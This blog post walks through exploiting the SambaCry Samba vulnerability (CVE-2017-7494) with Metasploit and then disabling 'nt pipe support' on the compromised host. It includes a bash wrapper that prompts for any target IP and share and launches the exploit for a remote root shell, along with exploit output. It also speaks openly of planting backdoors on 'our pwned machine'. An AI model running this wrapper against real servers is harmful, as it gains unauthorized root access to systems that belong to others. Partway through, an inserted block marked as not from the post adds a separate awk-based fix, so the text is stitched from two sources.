There has been more than enough coverage of how to hack into a Linux machine running a vulnerable Samba via CVE-2017-7494 (SambaCry), but what about reversing the evil way for good? When we get a remote root shell on the target machine we might as well fix the SambaCry vulnerability, right?
(Also to keep other bots/kiddies off our pwned machine once we have all the backdoors in place….)
So how do we do this, or how do we automate it? Not as easy as it looks. (It should be a piece of cake for seasoned C coders out there to rewrite the part of the shared object .so file that calls /bin/sh so that it runs a remediation sequence of commands instead. A quick and simple one would be something like this:)
# sed -i '/\[global\]/a nt pipe support = off ' /etc/samba/smb.conf
# /etc/init.d/samba restart
I have played around with this idea for a while now and turn to you for suggestions on improving the code.
In my test environment I have a Debian 8 Linux running the vulnerable Samba version 4.2.14+dfsg-0+deb8u5 with the following "insecure" configuration (to allow anonymous upload, for example):
[Share]
comment = Share
path = /DATA
guest ok = yes
browseable = yes
writable = yes
So I wrote a little helper for Metasploit that loads exploit/linux/samba/is_known_pipename for guest write access (you can rewrite it and add username/password variables to the code; it should be really simple):
#!/bin/bash
clear
echo "***************************************************************"
echo " EXPLOITER SAMBACRY PaTcHeR for GUEST USER "
echo " Lets fix Samba via this exploit and patch it "
echo "***************************************************************"
echo -e "What IP of remote Samba ? \c"
read host
echo -e "What is the share name ? : \c"
read name
echo '[*] Checking if metasploit is present..'
if [ -x ./msfconsole ]; then
    echo '[*] Found msfconsole in current path ........ good'
else
    echo '[-] No msfconsole in path...make sure you have this script in your metasploit-framework path'
    exit 1   # a missing msfconsole is a failure, so do not exit 0 here
fi
# Build the resource script that drives msfconsole non-interactively.
{
    echo 'use exploit/linux/samba/is_known_pipename'
    echo 'set PAYLOAD cmd/unix/interact'
    echo "set RHOST $host"
    echo "set SMB_SHARE_NAME $name"
    echo 'set ExitOnSession false'
    echo 'run'
    echo 'hostname'
    echo ''
} > samba.rc
echo './msfconsole -r samba.rc' > fix-samba.sh
chmod +x ./fix-samba.sh
./fix-samba.sh
Once I run this I get a remote root shell via cmd/unix/interact, which unfortunately is not scriptable, so it cannot run the custom commands that would remediate the SambaCry bug.
Payload advanced options (cmd/unix/interact):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   AutoRunScript                          no        A script to run automatically on session creation.
   InitialAutoRunScript                   no        An initial script to run on session creation (before AutoRunScript)
The cmd/unix/interact root shell is not a full shell that would let you run apt-get upgrade, for example, since it is missing all the profile settings of a proper shell (a nice description is here: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ ).
So we are stuck with a limited root shell where vi won't really work, but sed will definitely do. This is exactly what I ran on the rooted Debian 8:
sed -i '/\[global\]/a nt pipe support = off ' /etc/samba/smb.conf
/etc/init.d/samba reload
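The sed one-liner above (the same one suggested at the top of the post) appends a fresh line after [global] every time it runs and leaves any existing "nt pipe support = yes" in place, so it is not safe to re-run. As an added example that is not code from the post, here is an idempotent version of that fix; it assumes POSIX awk and that Samba is reloaded afterwards:

```shell
# Added example, not code from the original post: an idempotent form of the
# smb.conf fix above. The sed one-liner appends a new line after [global] on
# every run and leaves an existing "nt pipe support = yes" in place; these
# functions rewrite the setting instead. Assumes POSIX awk and a later reload.

# Exit 0 when [global] already disables nt pipe support, else 1. Only the
# last assignment inside [global] counts, as in Samba itself.
samba_pipe_support_disabled() {
    awk '
        /^[ \t]*\[/ { insec = (tolower($0) ~ /^[ \t]*\[global\]/); next }
        insec && tolower($0) ~ /^[ \t]*nt[ \t]+pipe[ \t]+support[ \t]*=/ {
            v = tolower($0); sub(/^[^=]*=[ \t]*/, "", v); sub(/[ \t]*$/, "", v)
            found = (v == "no" || v == "false" || v == "off" || v == "0")
        }
        END { exit(found ? 0 : 1) }
    ' "$1"
}

# Put "nt pipe support = no" directly under the [global] header, drop any
# other assignment in that section, and append a [global] section if the
# file has none. Rewritten in place so ownership and mode are preserved.
samba_disable_pipe_support() {
    tmp="$1.tmp.$$"
    awk '
        /^[ \t]*\[/ {
            insec = (tolower($0) ~ /^[ \t]*\[global\]/)
            print
            if (insec) { print "   nt pipe support = no"; seen = 1 }
            next
        }
        insec && tolower($0) ~ /^[ \t]*nt[ \t]+pipe[ \t]+support[ \t]*=/ { next }
        { print }
        END { if (!seen) { print "[global]"; print "   nt pipe support = no" } }
    ' "$1" > "$tmp" && cat "$tmp" > "$1" && rm -f "$tmp"
}

# Constructed sample of the share from the write-up, with pipes still enabled.
conf="$(mktemp)"
cat > "$conf" <<'EOF'
[global]
   nt pipe support = yes
[Share]
   path = /DATA
   guest ok = yes
EOF
samba_disable_pipe_support "$conf"
samba_disable_pipe_support "$conf"   # a second run adds no duplicate line
samba_pipe_support_disabled "$conf" && echo "mitigated, $(grep -c 'nt pipe support' "$conf") setting line(s)"
rm -f "$conf"
```

Disabling nt pipe support is the workaround from the Samba advisory for CVE-2017-7494 and can break some expected functionality for Windows clients; upgrading the Samba package is the real fix.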
Once I tried to re-run the exploit via Metasploit, it failed :)
resource (samba.rc)> run
[*] 192.168.11.7:445 - Using location \\192.168.11.7\Share\ for the path
[*] 192.168.11.7:445 - Retrieving the remote path of the share 'Share'
[-] 192.168.11.7:445 - Exploit failed: TypeError no implicit conversion of Symbol into Integer
[*] Exploit completed, but no session was created.
Finally, here is my video of the above efforts.